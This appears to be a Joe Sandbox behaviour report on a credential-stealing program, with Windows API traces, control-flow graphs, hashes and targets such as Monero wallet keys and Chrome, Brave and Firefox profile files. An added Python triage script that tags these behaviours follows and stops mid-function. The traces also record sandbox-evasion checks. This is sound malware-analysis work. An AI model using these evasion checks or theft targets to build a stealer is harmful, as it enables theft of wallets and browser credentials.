                    • Part of subcall function 00621220: ExitProcess.KERNEL32 ref: 00621294
                    • Part of subcall function 00636770: GetUserDefaultLangID.KERNEL32 ref: 00636774
                    • Part of subcall function 00621190: ExitProcess.KERNEL32 ref: 006211C6
                    • Part of subcall function 00637850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                    • Part of subcall function 00637850: RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                    • Part of subcall function 00637850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                    • Part of subcall function 006378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                    • Part of subcall function 006378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                    • Part of subcall function 006378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00636AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00636AF9
                  • Sleep.KERNEL32(00001770), ref: 00636B04
                  • CloseHandle.KERNEL32(?,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636B1A
                  • ExitProcess.KERNEL32 ref: 00636B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 230273eced40f8739088f769e18ef912fea5a98b14290b4d3a21f7c3121a6d6a
                  • Instruction ID: 358caa1e7a39a6c835188f28003559deddff06d7f1d95cade6a5c73ad366c596
                  • Opcode Fuzzy Hash: 230273eced40f8739088f769e18ef912fea5a98b14290b4d3a21f7c3121a6d6a
                  • Instruction Fuzzy Hash: DA314F71914208AADB44F7F0DC56BEE777AAF14300F01451CF242B61C1DF706A05DAEA

                  Control-flow Graph

                  control_flow_graph 1204 621220-621247 call 6389b0 GlobalMemoryStatusEx 1207 621273-62127a 1204->1207 1208 621249-621271 call 63da00 * 2 1204->1208 1210 621281-621285 1207->1210 1208->1210 1212 621287 1210->1212 1213 62129a-62129d 1210->1213 1215 621292-621294 ExitProcess 1212->1215 1216 621289-621290 1212->1216 1216->1213 1216->1215
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0062123E
                  • __aulldiv.LIBCMT ref: 00621258
                  • __aulldiv.LIBCMT ref: 00621266
                  • ExitProcess.KERNEL32 ref: 00621294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 5dc18c0d210c3ea912b2dae390643fd10dceef39357ff74629fd66cc35f7a276
                  • Instruction ID: 6d1af4a9677130922d09afde33b080ad4c1ac822c88d1357ea2486d6cdff11d5
                  • Opcode Fuzzy Hash: 5dc18c0d210c3ea912b2dae390643fd10dceef39357ff74629fd66cc35f7a276
                  • Instruction Fuzzy Hash: 08016DB0D49308FBEB10DBE4EC49B9EBB79AB14701F208048F705BA2C0D7B456818B99

                  Control-flow Graph

                  control_flow_graph 1218 636af3 1219 636b0a 1218->1219 1221 636aba-636ad7 call 63aad0 OpenEventA 1219->1221 1222 636b0c-636b22 call 636920 call 635b10 CloseHandle ExitProcess 1219->1222 1227 636af5-636b04 CloseHandle Sleep 1221->1227 1228 636ad9-636af1 call 63aad0 CreateEventA 1221->1228 1227->1219 1228->1222
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00636AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00636AF9
                  • Sleep.KERNEL32(00001770), ref: 00636B04
                  • CloseHandle.KERNEL32(?,00000000,?,01319200,?,0064110C,?,00000000,?,00641110,?,00000000,00640AEF), ref: 00636B1A
                  • ExitProcess.KERNEL32 ref: 00636B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: b537d1dca95a8391d265d4c504463a3d1854be330507b47103092cf8556384d4
                  • Instruction ID: afda312c3d2c46fef783cda381aab3bbf09abe7b4ec39df8c65afad6a6f52e90
                  • Opcode Fuzzy Hash: b537d1dca95a8391d265d4c504463a3d1854be330507b47103092cf8556384d4
                  • Instruction Fuzzy Hash: E9F03A30940209BAE740ABA0DD16BBDBA76FB04701F109518F913A61C1CBF05541EADA

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 7aca8808e71edac8fb25ac9f7a175a9c05003303aff2aef568b17ef4d894901b
                  • Instruction ID: 1ce2017539692fde55ee39bccec78219b69a1ac752bcf2b4a1f8e5710fae67a3
                  • Opcode Fuzzy Hash: 7aca8808e71edac8fb25ac9f7a175a9c05003303aff2aef568b17ef4d894901b
                  • Instruction Fuzzy Hash: 8F215EB1D00208ABDF14DFA4EC45ADE7B79FF04320F108629F955A7290EB706A0ADF81

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 00626280: InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                    • Part of subcall function 00626280: StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                    • Part of subcall function 00626280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                    • Part of subcall function 00626280: HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                    • Part of subcall function 00626280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                    • Part of subcall function 00626280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: f990d6b9b2fae3ada777a4e6a25e3ef18a059d6718641bf508106cdfbb668004
                  • Instruction ID: e7ba5c92b222c6d6aa88e8014e225620ed6923a0b5193334f3146e33dc30f297
                  • Opcode Fuzzy Hash: f990d6b9b2fae3ada777a4e6a25e3ef18a059d6718641bf508106cdfbb668004
                  • Instruction Fuzzy Hash: DF113070910148ABCB54FFA4DD92AED733AAF50300F40415CF84A5B192EF30AB06EAD5

                  Control-flow Graph

                  control_flow_graph 1275 6378e0-637937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 637942-637945 1275->1276 1277 637939-63793e 1275->1277 1278 637962-637972 1276->1278 1277->1278
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 13001849a8258c8efbc58474c8756f4db1dd2309368f03821fd3e7b376b7917c
                  • Instruction ID: c68234bb6e7d6bfa9355b5c9af20bf2fb3fd52458f0ea7d288d1e7e9bce5e982
                  • Opcode Fuzzy Hash: 13001849a8258c8efbc58474c8756f4db1dd2309368f03821fd3e7b376b7917c
                  • Instruction Fuzzy Hash: 880181F1A04208EBD714DF98DD45BAABBB8FB04B21F10422AFA45E7280C37559008BE2
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0062112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00621132
                  • ExitProcess.KERNEL32 ref: 00621143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: a5eed244ad22e1057b64c6e57bca09e84fadc0e258f05c3d961105898ee081dc
                  • Instruction ID: 08fbefde01cc763e671969dc4a0ee46a1898becbbcbf3b96be3a53dc9e03147c
                  • Opcode Fuzzy Hash: a5eed244ad22e1057b64c6e57bca09e84fadc0e258f05c3d961105898ee081dc
                  • Instruction Fuzzy Hash: CEE0E67094930CFBE7546BA0AC0EB497678BB05B05F105054F7097B5D0DAF526409E9A
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006210B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006210F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: dd8f3f064dcc41ca9e0e3420baff48925b65be4ec23e8439a46f6836b7508d4b
                  • Instruction ID: 5f52622689d7df3df4e3c7a09868f4a32c4cb8b341cc9f859f3b456f5060facc
                  • Opcode Fuzzy Hash: dd8f3f064dcc41ca9e0e3420baff48925b65be4ec23e8439a46f6836b7508d4b
                  • Instruction Fuzzy Hash: 0DF0E971641314BBE71496A4AC49FEAB7DCE705715F301448F504E7280D9715E00CEA4
                  APIs
                    • Part of subcall function 006378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
                    • Part of subcall function 006378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00637917
                    • Part of subcall function 006378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
                    • Part of subcall function 00637850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                    • Part of subcall function 00637850: RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                    • Part of subcall function 00637850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                  • ExitProcess.KERNEL32 ref: 006211C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: a679f7a27869fa551b148460cafc0fa2d12898513b346eff553c25a7a4fc0776
                  • Instruction ID: 1e7d32811fa661ea2aedaac25e5f194f95840d26dfe8183fb5f40b578ff797be
                  • Opcode Fuzzy Hash: a679f7a27869fa551b148460cafc0fa2d12898513b346eff553c25a7a4fc0776
                  • Instruction Fuzzy Hash: A4E0C2B190430917CA5473F0BC0EB6A328E6B20345F04143CFA06E3252FAB4FC108DAE
                  APIs
                  • wsprintfA.USER32 ref: 006338CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 006338E3
                  • lstrcat.KERNEL32(?,?), ref: 00633935
                  • StrCmpCA.SHLWAPI(?,00640F70), ref: 00633947
                  • StrCmpCA.SHLWAPI(?,00640F74), ref: 0063395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00633C67
                  • FindClose.KERNEL32(000000FF), ref: 00633C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 98ae8bfe64253255808f9d5942f91733c9bcfa81ba95fc68cf3414c52b1001c9
                  • Instruction ID: 50a9aed2e3192b24b5f304b782b26ea5550c6efcfbd4e171082c3325a9a4054e
                  • Opcode Fuzzy Hash: 98ae8bfe64253255808f9d5942f91733c9bcfa81ba95fc68cf3414c52b1001c9
                  • Instruction Fuzzy Hash: 2CA121B1900218ABDB64DFA4DC85FEE7379BF54300F044598F64DA6241EB759B84CFA2
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00640B32,00640B2B,00000000,?,?,?,006413F4,00640B2A), ref: 0062BEF5
                  • StrCmpCA.SHLWAPI(?,006413F8), ref: 0062BF4D
                  • StrCmpCA.SHLWAPI(?,006413FC), ref: 0062BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0062C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 2b16726dd0c56c0d6c45a95cafff309a36dd9bdfe03c587f61c631b6d80757de
                  • Instruction ID: d3b6c973b8d2a211d3375ac9264dddbc59c4f1fbeb49da1db6ab8e3e575d6def
                  • Opcode Fuzzy Hash: 2b16726dd0c56c0d6c45a95cafff309a36dd9bdfe03c587f61c631b6d80757de
                  • Instruction Fuzzy Hash: 20427172910104ABCB54FBA0DD96EED737EAF94300F40455CF94AA6181EE30AB49DFE6
                  APIs
                  • wsprintfA.USER32 ref: 0063492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00634943
                  • StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                  • StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                  • FindClose.KERNEL32(000000FF), ref: 00634B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: c5d39b59a168ccb43351922529a5f5a8158fd1776ed9b0fc475888f298e8984c
                  • Instruction ID: 65393caad262d03e6350f6359361f80629647526213f91e931c1c686d3705f7a
                  • Opcode Fuzzy Hash: c5d39b59a168ccb43351922529a5f5a8158fd1776ed9b0fc475888f298e8984c
                  • Instruction Fuzzy Hash: 5B6153B1900218ABCB64EBA0DC45FEA737DBB48700F058598F64AA6141EF75EB85CFD1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00634580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00634587
                  • wsprintfA.USER32 ref: 006345A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 006345BD
                  • StrCmpCA.SHLWAPI(?,00640FC4), ref: 006345EB
                  • StrCmpCA.SHLWAPI(?,00640FC8), ref: 00634601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0063468B
                  • FindClose.KERNEL32(000000FF), ref: 006346A0
                  • lstrcat.KERNEL32(?,0131F7E0), ref: 006346C5
                  • lstrcat.KERNEL32(?,0131EDF0), ref: 006346D8
                  • lstrlen.KERNEL32(?), ref: 006346E5
                  • lstrlen.KERNEL32(?), ref: 006346F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 2e0ccec3cbf777df9915d79a7ebcf1e46f972972112572d7ec304e72a29cef01
                  • Instruction ID: 001a34fbe7d410cc36a838f5f50c5435f48fc93d7bedbe1a63a819bd47a995fa
                  • Opcode Fuzzy Hash: 2e0ccec3cbf777df9915d79a7ebcf1e46f972972112572d7ec304e72a29cef01
                  • Instruction Fuzzy Hash: 5F5163B1900218ABC764EB70DC89FED737DBB58300F404598F649A6190EFB4EB848F92
                  APIs
                  • wsprintfA.USER32 ref: 00633EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00633EDA
                  • StrCmpCA.SHLWAPI(?,00640FAC), ref: 00633F08
                  • StrCmpCA.SHLWAPI(?,00640FB0), ref: 00633F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0063406C
                  • FindClose.KERNEL32(000000FF), ref: 00634081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 56325dd7de945cc2d11ea88cc0c5626fb6f5da0330371c09e677908b508c16d1
                  • Instruction ID: ace2872b11af91f46336f90466f4208271e7e746df6f16b0ea4dc68171bde983
                  • Opcode Fuzzy Hash: 56325dd7de945cc2d11ea88cc0c5626fb6f5da0330371c09e677908b508c16d1
                  • Instruction Fuzzy Hash: D05165B2900218ABCB24EBB4DC85EEA737DBB44300F40459CF759A7180DB75EB898F95
                  APIs
                  • wsprintfA.USER32 ref: 0062ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0062ED55
                  • StrCmpCA.SHLWAPI(?,00641538), ref: 0062EDAB
                  • StrCmpCA.SHLWAPI(?,0064153C), ref: 0062EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0062F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: e3cd827217099729c677e13dd3b1cc9afa23df34d1726b51fcf7665de2eda961
                  • Instruction ID: 9529860b0447c93446c8f5f5f3829aa770bb030e5ea9c643eba1673d5d6019d9
                  • Opcode Fuzzy Hash: e3cd827217099729c677e13dd3b1cc9afa23df34d1726b51fcf7665de2eda961
                  • Instruction Fuzzy Hash: EAE1F671911118AADB94FBA0DC51EEE733AAF54300F4141EDB54A62092EF306F8ADFD5
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006415B8,00640D96), ref: 0062F71E
                  • StrCmpCA.SHLWAPI(?,006415BC), ref: 0062F76F
                  • StrCmpCA.SHLWAPI(?,006415C0), ref: 0062F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0062FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 7a4a3eed490f2d50947fffdddc7c159268b7d92420b5abf43c1866803d2406db
                  • Instruction ID: 54f08af93e42408979dba16534f2cd6553775bda6b369e00bc99bd5d5ef403ff
                  • Opcode Fuzzy Hash: 7a4a3eed490f2d50947fffdddc7c159268b7d92420b5abf43c1866803d2406db
                  • Instruction Fuzzy Hash: 12B13271900118ABDB64FFA0DC95AEE737AAF54300F4085ACE44A96191EF30AB49DFD6
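The per-function API listings in this report follow a few recurring shapes: a wsprintfA/FindFirstFileA/StrCmpCA/FindNextFileA/FindClose directory walk over "%s\*" patterns, a GetComputerNameA/GetUserNameA lookup that ends in ExitProcess, a CopyFileA/DeleteFileA staging loop, and path constants such as \Monero\wallet.keys, prefs.js and \Brave\Preferences in the string IDs. The Python below is an added triage example, not Joe Sandbox code and not part of the report: it parses records in the report's own "APIs" format (a constructed sample excerpted verbatim from this page is embedded) and tags each function with the behaviour its call pattern implies. The tag names, the target-string table, and the inference that two StrCmpCA calls against constants four bytes apart are the usual "." / ".." skip are the example's own assumptions, not facts the report states.

```python
"""Added example: tag Joe Sandbox per-function API listings with stealer behaviours."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: four "APIs" records excerpted verbatim from this report.
SAMPLE_REPORT = r"""
APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006210B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006210F7
APIs
  • Part of subcall function 006378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637910
  • Part of subcall function 006378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0063792F
  • Part of subcall function 00637850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
• ExitProcess.KERNEL32 ref: 006211C6
APIs
  • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
• FindFirstFileA.KERNEL32(00000000,?,00640B32,00640B2B,00000000,?,?,?,006413F4,00640B2A), ref: 0062BEF5
• StrCmpCA.SHLWAPI(?,006413F8), ref: 0062BF4D
• StrCmpCA.SHLWAPI(?,006413FC), ref: 0062BF63
• FindNextFileA.KERNEL32(000000FF,?), ref: 0062C7BF
• FindClose.KERNEL32(000000FF), ref: 0062C7D1
• String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0064510C,?,?,?,006451B4,?,?,00000000,?,00000000), ref: 00621923
• StrCmpCA.SHLWAPI(?,0064525C), ref: 00621973
• StrCmpCA.SHLWAPI(?,00645304), ref: 00621989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00621D40
• DeleteFileA.KERNEL32(00000000), ref: 00621DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00621E20
• FindClose.KERNEL32(000000FF), ref: 00621E32
• String ID: \*.*
"""

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with "Part of subcall function X:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Artefact names a stealer goes after (the example's own table); matched in string IDs and call args.
TARGET_HINTS = {"wallet.keys": "Monero wallet keys", "prefs.js": "Firefox profile",
                "Preferences": "Chromium-based browser profile"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]   # address of the callee when the line is "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    @property
    def entry(self) -> str:
        """Label the record by the ref of its first direct (non-subcall) API call."""
        direct = [c for c in self.calls if c.subcall_of is None]
        return (direct or self.calls)[0].ref if self.calls else "?"

    def has(self, *apis: str, direct_only: bool = False) -> bool:
        seen = {c.api for c in self.calls if not (direct_only and c.subcall_of)}
        return all(a in seen for a in apis)


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the text at each 'APIs' header and collect calls and string IDs per record."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is not None:
            m = CALL_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                current.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
            elif (m := STRING_RE.match(line)):
                current.strings.extend(s for s in m["ids"].split("$") if s)
    return records


def classify(rec: FunctionRecord) -> List[str]:
    tags = []
    if rec.has("FindFirstFileA", "FindNextFileA", "FindClose", direct_only=True):
        tags.append("directory-walk")
        # Inference, not shown by the listing: "." and ".." padded to 4 bytes sit 4 bytes apart.
        ptrs = [int(c.args[1], 16) for c in rec.calls
                if c.api == "StrCmpCA" and len(c.args) == 2 and c.args[1] != "?"]
        if len(ptrs) == 2 and abs(ptrs[0] - ptrs[1]) == 4:
            tags.append("dot-dotdot-skip")
    if rec.has("GetComputerNameA") or rec.has("GetUserNameA"):
        tags.append("host-name-check-then-exit" if rec.has("ExitProcess", direct_only=True)
                    else "host-fingerprint")
    if rec.has("CopyFileA", "DeleteFileA", direct_only=True):
        tags.append("copy-then-delete")
    if rec.has("VirtualAlloc", "VirtualFree", direct_only=True):
        tags.append("scratch-allocation")
    haystack = rec.strings + [a for c in rec.calls for a in c.args]
    tags += [f"target:{what}" for needle, what in TARGET_HINTS.items()
             if any(needle in h for h in haystack)]
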